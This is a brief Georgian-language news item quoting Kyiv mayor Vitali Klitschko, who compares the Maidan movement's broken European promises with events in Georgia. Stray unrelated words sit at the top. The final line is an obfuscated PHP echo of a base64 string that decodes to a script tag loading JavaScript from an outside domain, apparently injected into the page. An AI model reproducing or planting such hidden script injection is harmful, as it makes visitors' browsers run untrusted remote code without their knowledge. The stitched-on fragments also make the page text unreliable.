celsiusi
ავერსი საქკაბელი

მაიდანი ასე დაიწყო, ევროპას გვპირდებოდნენ, რეალობა სხვა იყო, ეს ხდება საქართველოშიც, – ამის შესახებ კიევის მერმა, ვიტალი კლიჩკომ „ფორმულას“ ეთერში განაცხადა.

როგორც ვიტალი კლიჩკომ აღნიშნა, მნიშვნელოვანია, მთავრობა უსმენდეს ხალხს.

„მაიდანის მოძრაობა დაიწყო იმით, რომ იანუკოვიჩი ხალხს ჰპირდებოდა ევროპულ მომავალს. დაპირება და რეალობა აღმოჩნდა განსხვავებული. თამაშობდა თამაშს და სურდა ჩვენი რუსეთში მიყვანა, რუსული კანონების განხორციელება. ზუსტად იგივე რამ ხდება საქართველოში, მაგრამ ძალიან მნიშვნელოვანია თქვენი ბრძოლა ადამიანის უფლებებისთვის, ევროპული ღირებულებებისთვის, კანონის უზენაესობისთვის. მნიშვნელოვანია, მთავრობა უსმენდეს ხალხს“, – განაცხადა კლიჩკომ.

323
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");